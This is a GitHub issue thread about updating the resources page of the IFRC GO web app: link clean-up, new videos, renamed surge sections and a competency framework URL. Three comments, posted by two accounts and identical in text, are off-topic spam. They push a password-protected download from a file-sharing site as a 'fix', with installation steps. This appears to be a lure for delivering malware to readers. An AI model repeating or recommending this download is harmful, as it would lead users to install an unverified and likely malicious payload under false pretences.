### ISSUE TITLE
Resources page maintenance

### ISSUE THREAD

**Issue by tovari** [IFRCGo/go-web-app#1331]
GO resources page - to include
- clean up of old links:
  - remove: COP28 'All About That Base' Report, GO User Library
  - replace GO Workplan 2023 to GO Workplan 2024: https://ifrcorg.sharepoint.com/:b:/s/IFRCSharing/EQraprcbhQdGgH1L8tSQXFAByvRgyoBRfW46HTMh71Nzlw?e=dMQIr8
- Videos:
  - remove: 3W Instrcutional, Translation feature
  - add: 
    - Montandon, the Global Crisis Data Bank (https://youtu.be/BEWxqYfrQek?si=CIGoNnqa6N4UP5t4)

- rename IFRC Surge Services to IFRC Surge Links
  - add Catalogue of Surge Services (https://go.ifrc.org/surge/catalogue/overview) 
  - rename Surge IM network to Surge Information Management Support (SIMS) portal
  - Surge Learning (https://surgelearning.ifrc.org/)
  - core competency framework

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by szabozoltan69** [comment]
These are the changes:
![kép](https://github.com/user-attachments/assets/1839354c-61ec-4aa0-ae81-3c8326cf5dd3)

For _Core Competency Framework_ please give an URL.

**Comment by tovari** [comment]
@szabozoltan69, One more update request: please add the attached document to the 'Other IFRC Resources' box with the title 'Health Mapping - Phase 1 Report'

[Health Mapping - Phase 1 Report.pdf](https://github.com/user-attachments/files/16813603/Health.Mapping.-.Phase.1.Report.pdf)

**Comment by szabozoltan69** [comment]
![kép](https://github.com/user-attachments/assets/cb218d1c-32c6-450d-9864-77fc7fb202b0)

**Comment by szabozoltan69** [comment]
![kép](https://github.com/user-attachments/assets/72d3869d-05ce-477c-9df2-e64181a64d68)

**Comment by nanometrenat** [comment]
Core Competency Framework URL:  https://surgelearning.ifrc.org/resources/core-competency-framework-surge-personnel
